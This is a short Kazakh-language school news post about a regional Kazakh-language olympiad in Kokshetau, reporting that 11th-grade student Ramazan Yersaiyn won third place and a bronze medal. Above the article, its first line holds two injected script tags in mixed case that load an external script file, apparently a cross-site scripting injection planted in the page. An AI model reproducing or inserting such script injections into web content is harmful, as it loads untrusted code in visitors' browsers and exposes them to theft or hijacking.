<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
Олимпиада жүлдегері
15-16-ақпан күндері Көкшетау қаласында облыстық IХ «Жарқын болашақ» қазақ тілі олимпиадасы өтті. Олимпиаданың мақсаты – мемлекетік тілдің қолдану аясын кеңейту, қазақ халқының мәдени, әдеби және рухани қазыналарын кеңінен насихаттау, оқушылардың шығармашылық, ізденушілік қабілеттерін, мәдени дүниетанымын дамыту.
Олимпиадаға 17 ауданнан 85 оқушы, Степногорск және Көкшетау қаласының мектептерінен 15 оқушы және дарынды баларға арналған облыстық мамандандырылған мектеп интернаттардан 19 оқушы қатысты.
Біздің мектебімізден «Сөз шеберлері» бағыты бойынша 11-сынып оқушысы Рамазан Ерсайын қатысты. Бұл бағыт бойынша 26 оқушы бақ сынады. Солардың ішінен 6 оқушы жеңімпаз атанды. Ерсайын жүлделі III оынға ие болып, III дәрежелі диплом мен қола медаль және сыйлықпен марапатталды. (жетекшісі - Садвакасова Г.С.) Ерсайынға шығар асуың биік болсын, жеңімпаз атана бер деп тілек айтамыз.